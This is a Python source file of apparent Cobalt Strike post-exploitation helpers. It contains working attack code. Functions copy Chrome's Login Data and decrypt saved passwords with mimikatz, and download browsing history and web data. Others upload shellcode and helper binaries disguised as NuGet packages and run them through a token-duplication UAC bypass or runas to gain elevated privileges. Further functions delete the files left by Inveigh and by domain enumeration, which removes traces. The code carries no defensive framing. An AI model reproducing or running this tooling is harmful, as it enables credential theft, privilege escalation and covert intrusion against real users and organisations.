def _(bid):
chrome_dir = r'%localappdata%\Google\Chrome\User Data\Default'
chrome_dir_guessed = chrome_dir.replace(
'%localappdata%', r'{}\AppData\Local'.format(helpers.guess_home(bid)))
login_data = r'{}\Login Data'.format(chrome_dir_guessed)
cookies = r'{}\Cookies'.format(chrome_dir_guessed)
history = r'{}\History'.format(chrome_dir_guessed)
bookmarks = r'{}\Bookmarks'.format(chrome_dir_guessed)
web_data = r'{}\Web Data'.format(chrome_dir_guessed)
login_data_copied = '{}.bak2'.format(login_data)
cookies_copied = '{}.bak2'.format(cookies)
# non-protected files (History/Bookmarks)
aggressor.bdownload(bid, history)
aggressor.bdownload(bid, bookmarks)
aggressor.bdownload(bid, web_data)
# protected files (Login Data/Cookies)
#aggressor.bshell(bid, 'copy "{}" "{}"'.format(login_data, login_data_copied))
aggressor.bcp(bid, login_data, login_data_copied)
#aggressor.bshell(bid, 'copy "{}" "{}"'.format(cookies, cookies_copied))
#aggressor.bmimikatz(bid, r'dpapi::chrome /in:"{}" /unprotect'.format(cookies_copied))
aggressor.bmimikatz(
bid, r'dpapi::chrome /in:"{}" /unprotect'.format(login_data_copied))
aggressor.brm(bid, login_data_copied)
def _(bid):
#temp = r'{}\AppData\Local'.format(helpers.guess_home(bid))
temp = r'{}'.format(helpers.guess_home(bid))
out_file = r'{}\c'.format(temp)
dest = r'{}\temp.exe'.format(temp)
aggressor.brm(bid, dest)
aggressor.bdownload(bid, out_file)
def _(bid):
global _uploaded
if not _uploaded:
aggressor.berror('Run 7z-init first')
return
aggressor.brm(bid, _uploaded)
_uploaded = None
def _(bid, home=None):
if not home:
home = helpers.guess_home(bid)
directory = r'{}\AppData\Roaming\Microsoft'.format(home)
aggressor.btask(
bid, 'Tasked beacon to remove inveigh files in {}'.format(directory))
for fname in ('clear', 'log', 'v1', 'v2', 'form'):
aggressor.brm(bid, r'{}\{}'.format(directory, fname))
def elevate_shellcode_helper(bid, shellcode, function):
"""
Execute `shellcode` with a helper using <function> -Binary helper.exe -Arguments <shellcode>
"""
native_helper = utils.basedir('tools/native.exe')
native_helper_remote = r'{}\NugetPackage.exe'.format(
helpers.guess_temp(bid))
shellcode_remote = r'{}\nuget.package'.format(helpers.guess_temp(bid))
# delete first
aggressor.brm(bid, native_helper_remote, silent=True)
aggressor.brm(bid, shellcode_remote, silent=True)
# upload
helpers.upload_to(bid, native_helper, native_helper_remote, silent=True)
helpers.upload_to(bid, shellcode, shellcode_remote, silent=True)
# invoke
command = '{} {}'.format(native_helper_remote, shellcode_remote)
function(bid, command)
# clean up
aggressor.brm(bid, native_helper_remote, silent=True)
aggressor.brm(bid, shellcode_remote, silent=True)
def elevate_runas_shellcode(bid, user, password, shellcode):
"""
Elevate with token duplication bypass. Execute `shellcode` with a helper.
"""
native_helper = utils.basedir('tools/native.exe')
native_helper_remote = r'{}\NugetPackage.{}.exe'.format(
helpers.guess_temp(bid), helpers.randstr())
shellcode_remote = r'{}\nuget2.package'.format(helpers.guess_temp(bid))
# delete first
aggressor.brm(bid, native_helper_remote, silent=True)
aggressor.brm(bid, shellcode_remote, silent=True)
aggressor.blog2(
bid, 'uploading to {} and {}'.format(native_helper_remote,
shellcode_remote))
# upload
helpers.upload_to(bid, native_helper, native_helper_remote, silent=True)
helpers.upload_to(bid, shellcode, shellcode_remote, silent=True)
if '\\' in user:
domain, user = user.split('\\')
else:
raise RuntimeError('must specify user domain')
# invoke
aggressor.brunas(bid, domain, user, password, native_helper_remote)
# clean up
aggressor.brm(bid, native_helper_remote, silent=True)
aggressor.brm(bid, shellcode_remote, silent=True)
def elevate_token_shellcode_csharp(bid, shellcode):
"""
Elevate with token duplication bypass. Execute `shellcode` with a C# helper.
"""
aggressor.bpowershell_import(
bid, utils.basedir('modules/FilelessUACBypass.ps1'))
execute_shellcode = utils.basedir('tools/execute_shellcode.exe')
execute_assembly = utils.basedir('tools/execute_assembly.exe')
stage1 = r'{}\NugetPackage.exe'.format(helpers.guess_temp(bid))
#stage2 = r'{}\nuget_update.package'.format(helpers.guess_temp(bid))
stage2 = r'{}\Stage2.exe'.format(helpers.guess_temp(bid))
package = r'{}\nuget.package'.format(helpers.guess_temp(bid))
helpers.upload_to(bid, execute_assembly, stage1)
helpers.upload_to(bid, execute_shellcode, stage2)
helpers.upload_to(bid, shellcode, package)
command = 'Invoke-TokenDuplication -Binary {}'.format(
powershell_quote(stage2))
aggressor.bpowerpick(bid, command)
aggressor.brm(bid, stage1)
aggressor.brm(bid, stage2)
aggressor.brm(bid, package)
def _(bid):
#temp = r'{}\AppData\Local'.format(helpers.guess_home(bid))
temp = r'{}'.format(helpers.guess_home(bid))
out_file = r'{}\c'.format(temp)
aggressor.brm(bid, out_file)
def _(bid):
temp = helpers.guess_temp(bid)
aggressor.btask(
bid, 'Tasked beacon to clean up files from domain-enum (stage 3/3)')
aggressor.brm(bid, r'{}\objects.domain'.format(temp))
aggressor.brm(bid, r'{}\policy.domain'.format(temp))
aggressor.brm(bid, r'{}\sites.domain'.format(temp))
aggressor.brm(bid, r'{}\subnets.domain'.format(temp))
aggressor.brm(bid, r'{}\gpo_localgroups.domain'.format(temp))
aggressor.brm(bid, r'{}\gpo_delegations.domain'.format(temp))
aggressor.brm(bid, r'{}\gpo_acls.domain'.format(temp))
aggressor.brm(bid, r'{}\trusts.domain'.format(temp))
aggressor.brm(bid, r'{}\managers.domain'.format(temp))
aggressor.brm(bid, r'{}\interesting_acls.domain'.format(temp))